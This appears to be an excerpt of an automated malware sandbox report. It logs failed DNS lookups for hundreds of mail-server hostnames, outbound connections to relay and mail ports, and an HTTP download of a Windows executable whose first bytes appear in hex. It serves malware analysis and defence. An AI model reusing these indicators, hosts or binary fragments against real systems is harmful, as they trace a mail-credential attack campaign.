Source: unknown	DNS traffic detected: query: imap.igs-ruelzheim.rp.lo-net2.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mail.ptotonmail.ch replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop3.utlohotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.smhotmaillang.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: imap.radiussystemllc.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.terminatour-bohotmailing.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop3.joaz.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: smtp.runyai-hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: relay.lavera2.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: hotmail.demail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.x-erfolgsteam.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.schupp-hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop.smhotmaillang.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: relay.ufer-hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: relay.hotmailjoy.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: imap.homehotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mail.morr-hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mailgate.utlohotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: smtp.jtirit.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop.outlook.fr.sg replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop3.imao.ml replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop.heinzerlinghotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mailgate.tux4hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mailgate.gothic-concerts.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.hoenighotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mailgate.kvapilova.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mail.jalds.org replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: relay.hotmail.fr.br replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: relay.hotmail.fryahoo.fr replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop.hotmailhome.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mail.rubypink.co.uk replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mailgate.scw-hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: att.in replaycode: Server failure (2)
Source: unknown	DNS traffic detected: query: hotmailhome.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop3.oulohotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop3.igs-ruelzheim.rp.lo-net2.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop.gamma.ocm.ne.jp replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: dancenight-express.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ssh.hotmail.fr.tr replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: imap.fos-elektronik.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ptotonmail.ch replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop3.lavera2.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.jalds.org replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop3.hotmail.fr.br replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop.dancenight-express.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: relay.x-erfolgsteam.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: homehotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ssh.fos-elektronik.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: imap.hotmail.fryahoo.fr replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: radiussystemllc.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop.hotmail.demail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: imap.esafrica.co.zw replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: imap.runyai-hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: imap.att.co.id replaycode: Server failure (2)
Source: unknown	DNS traffic detected: query: pop3.newhotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mailgate.gamma.ocm.ne.jp replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop.hotmail.fryahoo.fr replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mail.hotmail.fr.tr replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: imap.morr-hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mailgate.joaz.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mailgate.att.in replaycode: Server failure (2)
Source: unknown	DNS traffic detected: query: smtp.zube-hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop.zube-hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: imap.spd-hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop.hotmail.fr.ar replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ssh.hotmailhome.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mailgate.zube-hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mailgate.runyai-hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.kvapilova.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ssh.dancenight-express.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: imap.ufer-hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mailgate.generika-apotheke-hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mailgate.morr-hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: smtp.jalds.org replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: relay.newhotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: smhotmaillang.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mailgate.smhotmaillang.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: imap.lavera2.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: jtirit.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mailgate.sq-community.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop.schupp-hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: terminatour-bohotmailing.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: undercover-bietigheim.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop.igs-ruelzheim.rp.lo-net2.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: relay.att.no replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: igs-ruelzheim.rp.lo-net2.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: fos-elektronik.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop3.spd-hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mail.kvapilova.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: smtp.igs-ruelzheim.rp.lo-net2.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop.esafrica.co.zw replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ssh.hotmail-topmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: newhotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: smtp.tux4hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.fos-elektronik.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mailgate.oulohotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.temxp.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.igs-ruelzheim.rp.lo-net2.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: relay.hotmail-topmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mail.utlohotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.ptotonmail.ch replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: smtp.gothic-concerts.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: smtp.esafrica.co.zw replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: scw-hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ssh.undercover-bietigheim.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: hotmail.fr.br replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: relay.morr-hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mail.runyai-hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mail.generika-apotheke-hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: kvapilova.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: relay.hoenighotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.tux4hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: generika-apotheke-hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.gamma.ocm.ne.jp replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop3.schupp-hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ssh.archononline.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: imap.sq-community.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.oulohotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ssh.hotmail.fr.br replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ssh.farma-aps.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: imap.oulohotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: relay.kvapilova.net replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: x-erfolgsteam.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: imap.gothic-concerts.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: relay.fos-elektronik.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: gothic-concerts.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: imap.tux4hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.utlohotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ssh.ufer-hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: imao.ml replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mail.joaz.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: relay.homehotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: imap.hotmail.fr.br replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ssh.esafrica.co.zw replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: tux4hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mail.hotmailhome.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: smtp.scw-hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: rubypink.co.uk replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mail.lavera2.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ssh.att.in replaycode: Server failure (2)
Source: unknown	DNS traffic detected: query: ssh.lavera2.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop3.x-erfolgsteam.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.archononline.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: outlook.fr.sg replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.hotmailhome.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mail.hotmail.fr.br replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: smtp.fos-elektronik.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.hotmail.fryahoo.fr replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop.morr-hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mailgate.schupp-hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: smtp.spd-hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop.tux4hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop.ptotonmail.ch replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: hotmail.fr.tr replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop.spd-hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mail.dancenight-express.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.hotmailjoy.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: relay.sq-community.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mailgate.terminatour-bohotmailing.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: smtp.gamma.ocm.ne.jp replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: schupp-hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop.runyai-hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ssh.scw-hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ssh.spd-hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: smtp.newhotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: smtp.outlook.fr.sg replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop3.radiussystemllc.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: smtp.hotmail.fryahoo.fr replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mailgate.heinzerlinghotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.dancenight-express.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: imap.farma-aps.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.spd-hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.sq-community.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop.hotmail.fr.br replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ssh.igs-ruelzheim.rp.lo-net2.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ssh.gamma.ocm.ne.jp replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop.jtirit.com replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ssh.utlohotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ssh.ptotonmail.ch replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ftp.hotmail.fr.br replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: relay.tux4hotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop.terminatour-bohotmailing.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: pop3.hotmailjoy.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: relay.oulohotmail.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: ssh.gothic-concerts.de replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: mail.homehotmail.de replaycode: Name error (3)

Source: unknown

Network traffic detected: DNS query count 629

Source: unknown

Network traffic detected: IP country count 22

Source: global traffic	TCP traffic: 192.168.2.6:49716 -> 143.107.229.120:40233
Source: global traffic	TCP traffic: 192.168.2.6:49718 -> 147.92.88.67:9001
Source: global traffic	TCP traffic: 192.168.2.6:49740 -> 185.220.101.1:30001
Source: global traffic	TCP traffic: 192.168.2.6:49756 -> 51.15.89.13:14433
Source: global traffic	TCP traffic: 192.168.2.6:49758 -> 163.172.154.142:14433
Source: global traffic	TCP traffic: 192.168.2.6:49760 -> 185.220.101.206:30206
Source: global traffic	TCP traffic: 192.168.2.6:49767 -> 193.160.32.19:9001
Source: global traffic	TCP traffic: 192.168.2.6:49768 -> 128.31.0.39:9101
Source: global traffic	TCP traffic: 192.168.2.6:49769 -> 91.121.181.6:9001
Source: global traffic	TCP traffic: 192.168.2.6:49777 -> 185.220.101.144:30144
Source: global traffic	TCP traffic: 192.168.2.6:49778 -> 176.123.3.222:9001
Source: global traffic	TCP traffic: 192.168.2.6:49779 -> 185.159.70.47:46031
Source: global traffic	TCP traffic: 192.168.2.6:49781 -> 5.59.227.51:9001
Source: global traffic	TCP traffic: 192.168.2.6:49789 -> 195.205.30.250:9001
Source: global traffic	TCP traffic: 192.168.2.6:49793 -> 185.220.101.198:8443
Source: global traffic	TCP traffic: 192.168.2.6:50775 -> 45.155.249.96:2023
Source: global traffic	TCP traffic: 192.168.2.6:50934 -> 104.21.54.169:995
Source: global traffic	TCP traffic: 192.168.2.6:51531 -> 13.248.169.48:143
Source: global traffic	TCP traffic: 192.168.2.6:51547 -> 64.233.184.27:143
Source: global traffic	TCP traffic: 192.168.2.6:51598 -> 81.169.145.97:143
Source: global traffic	TCP traffic: 192.168.2.6:51600 -> 52.101.68.3:143
Source: global traffic	TCP traffic: 192.168.2.6:51602 -> 52.101.73.15:143
Source: global traffic	TCP traffic: 192.168.2.6:52159 -> 15.197.142.173:143
Source: global traffic	TCP traffic: 192.168.2.6:52160 -> 185.177.47.38:143
Source: global traffic	TCP traffic: 192.168.2.6:52161 -> 3.33.139.32:995
Source: global traffic	TCP traffic: 192.168.2.6:52162 -> 162.241.216.197:995
Source: global traffic	TCP traffic: 192.168.2.6:52173 -> 91.136.8.194:995
Source: global traffic	TCP traffic: 192.168.2.6:52178 -> 15.161.71.77:143
Source: global traffic	TCP traffic: 192.168.2.6:52181 -> 15.197.204.56:995
Source: global traffic	TCP traffic: 192.168.2.6:52182 -> 185.107.56.198:143
Source: global traffic	TCP traffic: 192.168.2.6:52192 -> 46.105.45.21:143
Source: global traffic	TCP traffic: 192.168.2.6:52194 -> 88.99.82.73:143
Source: global traffic	TCP traffic: 192.168.2.6:52195 -> 217.70.178.1:143
Source: global traffic	TCP traffic: 192.168.2.6:52198 -> 38.111.198.185:143
Source: global traffic	TCP traffic: 192.168.2.6:52199 -> 217.72.192.67:143
Source: global traffic	TCP traffic: 192.168.2.6:52205 -> 85.119.249.224:995
Source: global traffic	TCP traffic: 192.168.2.6:52206 -> 142.93.237.125:995
Source: global traffic	TCP traffic: 192.168.2.6:52207 -> 103.224.212.34:143
Source: global traffic	TCP traffic: 192.168.2.6:52211 -> 142.250.31.27:995
Source: global traffic	TCP traffic: 192.168.2.6:52212 -> 52.101.68.25:995
Source: global traffic	TCP traffic: 192.168.2.6:52213 -> 59.106.13.100:143
Source: global traffic	TCP traffic: 192.168.2.6:52219 -> 138.197.213.185:143
Source: global traffic	TCP traffic: 192.168.2.6:52220 -> 142.250.153.27:143
Source: global traffic	TCP traffic: 192.168.2.6:52230 -> 209.85.202.26:143
Source: global traffic	TCP traffic: 192.168.2.6:52233 -> 104.47.24.36:143
Source: global traffic	TCP traffic: 192.168.2.6:52235 -> 104.47.59.138:143
Source: global traffic	TCP traffic: 192.168.2.6:52237 -> 130.185.80.210:995
Source: global traffic	TCP traffic: 192.168.2.6:52269 -> 188.40.92.90:143
Source: global traffic	TCP traffic: 192.168.2.6:52355 -> 86.105.245.69:995
Source: global traffic	TCP traffic: 192.168.2.6:53125 -> 202.124.241.196:143
Source: global traffic	TCP traffic: 192.168.2.6:53132 -> 122.146.164.33:995
Source: global traffic	TCP traffic: 192.168.2.6:53159 -> 143.244.202.96:143
Source: global traffic	TCP traffic: 192.168.2.6:53163 -> 104.47.22.10:143
Source: global traffic	TCP traffic: 192.168.2.6:53177 -> 223.29.45.22:995
Source: global traffic	TCP traffic: 192.168.2.6:53222 -> 218.213.216.154:143
Source: global traffic	TCP traffic: 192.168.2.6:53246 -> 20.75.101.58:143
Source: global traffic	TCP traffic: 192.168.2.6:53292 -> 86.107.32.28:60213
Source: global traffic	TCP traffic: 192.168.2.6:53623 -> 78.47.2.70:995
Source: global traffic	TCP traffic: 192.168.2.6:54838 -> 52.101.8.34:995
Source: global traffic	TCP traffic: 192.168.2.6:55044 -> 52.101.42.6:995
Source: global traffic	TCP traffic: 192.168.2.6:55703 -> 213.254.36.27:143
Source: global traffic	TCP traffic: 192.168.2.6:55879 -> 76.223.54.146:143
Source: global traffic	TCP traffic: 192.168.2.6:55883 -> 162.255.118.13:143
Source: global traffic	TCP traffic: 192.168.2.6:55886 -> 142.250.27.26:143
Source: global traffic	TCP traffic: 192.168.2.6:55894 -> 142.250.31.26:995
Source: global traffic	TCP traffic: 192.168.2.6:55896 -> 52.101.73.6:143
Source: global traffic	TCP traffic: 192.168.2.6:55897 -> 52.101.73.12:143
Source: global traffic	TCP traffic: 192.168.2.6:55921 -> 91.208.173.98:143
Source: global traffic	TCP traffic: 192.168.2.6:55935 -> 185.164.14.102:995
Source: global traffic	TCP traffic: 192.168.2.6:55978 -> 3.33.152.147:143
Source: global traffic	TCP traffic: 192.168.2.6:56211 -> 104.47.66.10:143
Source: global traffic	TCP traffic: 192.168.2.6:56324 -> 3.33.243.145:995
Source: global traffic	TCP traffic: 192.168.2.6:56386 -> 85.119.249.226:995
Source: global traffic	TCP traffic: 192.168.2.6:56387 -> 52.101.68.5:995
Source: global traffic	TCP traffic: 192.168.2.6:56394 -> 104.47.55.138:143
Source: global traffic	TCP traffic: 192.168.2.6:56395 -> 104.47.25.36:143
Source: global traffic	TCP traffic: 192.168.2.6:56396 -> 130.185.80.200:995
Source: global traffic	TCP traffic: 192.168.2.6:56843 -> 45.136.114.149:2222
Source: global traffic	TCP traffic: 192.168.2.6:57475 -> 104.47.22.74:143
Source: global traffic	TCP traffic: 192.168.2.6:58788 -> 52.101.73.4:143
Source: global traffic	TCP traffic: 192.168.2.6:58789 -> 52.101.73.19:143
Source: global traffic	TCP traffic: 192.168.2.6:59782 -> 52.101.11.7:995
Source: global traffic	TCP traffic: 192.168.2.6:59896 -> 52.101.42.4:143
Source: global traffic	TCP traffic: 192.168.2.6:60149 -> 85.119.249.225:995
Source: global traffic	TCP traffic: 192.168.2.6:60150 -> 52.101.68.16:995
Source: global traffic	TCP traffic: 192.168.2.6:60362 -> 109.71.47.60:995
Source: global traffic	TCP traffic: 192.168.2.6:60774 -> 52.101.68.15:143
Source: global traffic	TCP traffic: 192.168.2.6:61801 -> 52.101.73.11:143
Source: global traffic	TCP traffic: 192.168.2.6:61802 -> 52.101.73.28:143
Source: global traffic	TCP traffic: 192.168.2.6:62064 -> 62.210.211.126:222
Source: global traffic	TCP traffic: 192.168.2.6:62127 -> 85.119.249.227:995
Source: global traffic	TCP traffic: 192.168.2.6:62138 -> 52.101.68.8:995
Source: global traffic	TCP traffic: 192.168.2.6:62162 -> 109.71.47.160:995
Source: global traffic	TCP traffic: 192.168.2.6:62308 -> 72.52.178.23:990
Source: global traffic	TCP traffic: 192.168.2.6:62309 -> 103.224.182.253:990
Source: global traffic	TCP traffic: 192.168.2.6:62646 -> 81.169.145.86:222
Source: global traffic	TCP traffic: 192.168.2.6:62753 -> 52.101.41.0:143
Source: global traffic	TCP traffic: 192.168.2.6:62758 -> 52.101.9.5:143
Source: global traffic	TCP traffic: 192.168.2.6:62903 -> 212.227.15.41:587
Source: global traffic	TCP traffic: 192.168.2.6:63137 -> 109.71.47.152:995
Source: global traffic	TCP traffic: 192.168.2.6:63148 -> 52.101.68.27:995
Source: global traffic	TCP traffic: 192.168.2.6:63449 -> 221.121.158.21:990
Source: global traffic	TCP traffic: 192.168.2.6:63741 -> 217.26.61.200:990
Source: global traffic	TCP traffic: 192.168.2.6:64105 -> 144.91.85.110:990
Source: global traffic	TCP traffic: 192.168.2.6:64503 -> 142.250.153.26:995
Source: global traffic	TCP traffic: 192.168.2.6:65185 -> 91.136.8.144:990
Source: global traffic	TCP traffic: 192.168.2.6:65221 -> 217.160.122.119:990
Source: global traffic	TCP traffic: 192.168.2.6:65300 -> 85.13.138.112:990
Source: global traffic	TCP traffic: 192.168.2.6:65483 -> 178.33.253.225:990
Source: global traffic	TCP traffic: 192.168.2.6:51108 -> 81.169.145.143:990
Source: global traffic	TCP traffic: 192.168.2.6:52398 -> 104.21.66.152:990
Source: global traffic	TCP traffic: 192.168.2.6:52650 -> 3.33.130.190:222
Source: global traffic	TCP traffic: 192.168.2.6:52768 -> 52.101.68.36:143
Source: global traffic	TCP traffic: 192.168.2.6:53549 -> 185.230.63.186:990
Source: global traffic	TCP traffic: 192.168.2.6:55609 -> 52.101.73.16:995
Source: global traffic	TCP traffic: 192.168.2.6:56180 -> 185.230.63.107:222
Source: global traffic	TCP traffic: 192.168.2.6:56303 -> 52.101.9.0:993
Source: global traffic	TCP traffic: 192.168.2.6:56677 -> 87.98.132.45:995
Source: global traffic	TCP traffic: 192.168.2.6:57560 -> 52.101.73.8:143
Source: global traffic	TCP traffic: 192.168.2.6:57561 -> 52.101.68.12:143
Source: global traffic	TCP traffic: 192.168.2.6:57874 -> 185.230.63.171:222
Source: global traffic	TCP traffic: 192.168.2.6:58282 -> 198.185.159.145:990
Source: global traffic	TCP traffic: 192.168.2.6:58489 -> 52.101.68.10:143
Source: global traffic	TCP traffic: 192.168.2.6:58783 -> 185.39.146.199:990
Source: global traffic	TCP traffic: 192.168.2.6:58794 -> 45.147.96.4:990
Source: global traffic	TCP traffic: 192.168.2.6:58797 -> 213.208.126.141:222
Source: global traffic	TCP traffic: 192.168.2.6:58831 -> 217.160.0.208:222
Source: global traffic	TCP traffic: 192.168.2.6:58832 -> 213.186.33.4:222
Source: global traffic	TCP traffic: 192.168.2.6:58834 -> 91.195.240.135:990
Source: global traffic	TCP traffic: 192.168.2.6:58893 -> 217.70.184.38:990
Source: global traffic	TCP traffic: 192.168.2.6:58894 -> 23.236.62.147:990
Source: global traffic	TCP traffic: 192.168.2.6:58933 -> 85.214.145.11:990
Source: global traffic	TCP traffic: 192.168.2.6:58934 -> 213.186.33.5:222
Source: global traffic	TCP traffic: 192.168.2.6:58935 -> 62.156.168.56:990
Source: global traffic	TCP traffic: 192.168.2.6:58937 -> 13.248.243.5:990
Source: global traffic	TCP traffic: 192.168.2.6:58940 -> 162.0.235.125:222
Source: global traffic	TCP traffic: 192.168.2.6:58948 -> 217.160.0.179:222
Source: global traffic	TCP traffic: 192.168.2.6:58951 -> 75.2.70.75:222
Source: global traffic	TCP traffic: 192.168.2.6:58957 -> 13.232.255.130:990
Source: global traffic	TCP traffic: 192.168.2.6:59235 -> 15.197.148.33:222
Source: global traffic	TCP traffic: 192.168.2.6:59731 -> 130.185.80.60:995
Source: global traffic	TCP traffic: 192.168.2.6:60352 -> 52.101.41.6:143
Source: global traffic	TCP traffic: 192.168.2.6:60376 -> 52.101.40.6:143
Source: global traffic	TCP traffic: 192.168.2.6:60846 -> 52.101.11.2:143
Source: global traffic	TCP traffic: 192.168.2.6:60850 -> 52.101.8.44:143
Source: global traffic	TCP traffic: 192.168.2.6:60903 -> 52.101.8.32:143
Source: global traffic	TCP traffic: 192.168.2.6:60906 -> 52.101.10.10:143
Source: global traffic	TCP traffic: 192.168.2.6:60927 -> 52.101.10.2:143
Source: global traffic	TCP traffic: 192.168.2.6:60929 -> 52.101.41.3:143
Source: global traffic	TCP traffic: 192.168.2.6:61041 -> 52.101.41.4:587

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 20 Feb 2024 23:22:35 GMTContent-Type: application/octet-streamContent-Length: 9104384Last-Modified: Fri, 02 Feb 2024 16:13:27 GMTConnection: keep-aliveETag: "65bd14a7-8aec00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 a7 14 bd 65 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 e2 8a 00 00 08 00 00 00 00 00 00 ae 00 8b 00 00 20 00 00 00 20 8b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 8b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 60 00 8b 00 4b 00 00 00 00 20 8b 00 40 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 8b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b4 e0 8a 00 00 20 00 00 00 e2 8a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 